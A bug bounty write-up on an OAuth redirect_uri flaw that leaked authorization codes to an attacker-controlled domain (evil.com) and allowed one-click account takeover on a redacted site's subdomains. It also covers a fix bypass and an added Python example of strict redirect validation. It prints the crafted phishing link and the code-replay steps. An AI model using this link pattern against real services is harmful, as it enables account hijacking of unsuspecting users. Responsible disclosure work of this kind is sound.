Never underestimate the power of open redirect, a story of a full account takeover

In the name of God, the Most Gracious, the Most Merciful

It is a private program I have been hacking on for months. One night I realised that they had added another security layer, a second-factor authentication (2FA). Like every bug bounty hunter, I tried to see if I could bypass the 2FA mechanism: I tried brute-force attacks, but that didn't work as I got rate limited after sending a few invalid codes using Burp Suite Intruder; I tried response manipulation (and status code manipulation) but failed too. I then gave up and slept.

The next day I revisited the website to understand properly how the 2FA works, but this time around I was very careful about everything that was happening, and I got the bug without even using any tool. Let's break it down.

Note: Let's assume the target is redacted.com

- Whenever a user tries to login to partners.redacted.com with valid credentials, he will be redirected to

https://pin.redacted.com/?client_id=cpp&response_type=code&redirect_uri=https:%252F%252Fredacted.com%252F.........

- I did what I know you will do too: you will change the redirect_uri, right? But open redirect is out of scope in the program policy. I changed redacted.com to evil.com and surprisingly I got redirected to

https://evil.com/shell-auth?code=<access-token-here>&state=... I was kind of wowww, I was able to leak the victim's auth-token/access-token.

- Yet this is not valid unless I can use that token. I then opened a new Incognito tab, pasted https://evil.com/shell-auth?code=<access-token-here>&state=... and changed it to https://redacted.com/shell-auth?code=<access-token-here>&state=... Nothing happened, because redacted.com does not have any login functionality.

- I then tried https://partners.redacted.com/shell-auth?code=<access-token-here>&state=... Nice one, I was able to log in to https://partners.redacted.com with that code, and I was also able to log in to other subdomains such as marketing.redacted.com with that code.

If you understand the flow, this is a single-click account takeover bug: an attacker only needs to share this link

https://pin.redacted.com/?client_id=cpp&response_type=code&redirect_uri=https:%252F%252Fevil.com%252F... with the victim. Once the victim clicks on the link, his auth-token will be leaked to the attacker's server, and the attacker will be able to log in to the victim's account on partners.redacted.com or marketing.redacted.com.

Timeline:

Reported: Jul 30th 2022

Triaged: Aug 1st 2022

Rewarded: Aug 4th 2022

Closed as resolved: Aug 4th 2022

Fix bypass:

After some days I noticed that the redirection was not patched. What happened is that the user just gets an error message when the redirect_uri is not a whitelisted domain, but he will still be redirected to the malicious site if he requests a new code; now he must enter the code before he is redirected to the attacker's domain.
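Both the original flow (the authorization server forwarding the code to whatever redirect_uri was supplied) and the fix bypass (an error message followed by a redirect anyway) come down to the same server-side decision: the redirect_uri must be matched exactly against the URIs registered for the client_id before any code is issued, and an unregistered value must end the request without a Location header. The following is an added example written for this post, not the program's own code; the client id, hostnames, allowlist, and function names are constructed assumptions.

```python
"""Added example (not the program's own code): strict redirect_uri handling for
an OAuth-style authorization endpoint like the one described above.
Client ids, hostnames and the allowlist are constructed for illustration."""
from urllib.parse import urlsplit, unquote, urlencode
import secrets

# Constructed registration: each client_id maps to its exact redirect URIs.
REGISTERED_REDIRECT_URIS = {
    "cpp": {
        "https://partners.redacted.com/shell-auth",
        "https://marketing.redacted.com/shell-auth",
    },
}


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo layered percent-encoding (the post's URL carries %252F, i.e. '/'
    encoded twice) so the comparison below always sees one canonical form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def weak_check(redirect_uri: str) -> bool:
    """The kind of substring check that is insufficient: the registered
    domain merely has to appear somewhere in an attacker-chosen URL."""
    return "redacted.com" in fully_decode(redirect_uri)


def resolve_redirect_uri(client_id: str, redirect_uri: str):
    """Return the registered URI that exactly matches the request, else None.

    Exact matching on scheme + host + path against the registration; no
    prefix, suffix or substring logic, and no query or fragment allowed.
    """
    parts = urlsplit(fully_decode(redirect_uri))
    if parts.scheme != "https" or parts.query or parts.fragment:
        return None
    candidate = f"https://{parts.netloc.lower()}{parts.path or '/'}"
    if candidate in REGISTERED_REDIRECT_URIS.get(client_id, set()):
        return candidate
    return None


def authorize(client_id: str, redirect_uri: str, user_authenticated: bool,
              state: str = "") -> dict:
    """Authorization endpoint decision, returned as a small response dict.

    The ordering is the point of the post's fix bypass: an unregistered
    redirect_uri ends the request with an error page and no Location header.
    It must never be 'show an error now, redirect with a code later'.
    """
    target = resolve_redirect_uri(client_id, redirect_uri)
    if target is None:
        return {"status": 400, "location": None,
                "body": "error: redirect_uri is not registered for this client"}
    if not user_authenticated:
        return {"status": 401, "location": None, "body": "authenticate first"}
    code = secrets.token_urlsafe(24)  # single-use and short-lived in a real server
    # Redirect to the registered URI, never to the raw parameter value.
    return {"status": 302,
            "location": f"{target}?{urlencode({'code': code, 'state': state})}",
            "body": ""}


if __name__ == "__main__":
    print(weak_check("https://evil.com/?next=redacted.com"))        # True: fooled
    print(resolve_redirect_uri("cpp", "https:%252F%252Fevil.com%252Fshell-auth"))
    print(authorize("cpp", "https://evil.com/shell-auth", True, "s1")["status"])
    print(authorize("cpp", "https://partners.redacted.com/shell-auth", True, "s1"))
```

The decoding step exists only to normalise the request before the exact comparison; the value that ends up in the Location header is always the registered string from the allowlist, so encoding tricks in the parameter cannot change where the code is delivered.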

I created a new ticket and same bounty was paid as in the first report.

Suggestions  and corrections are always welcome.

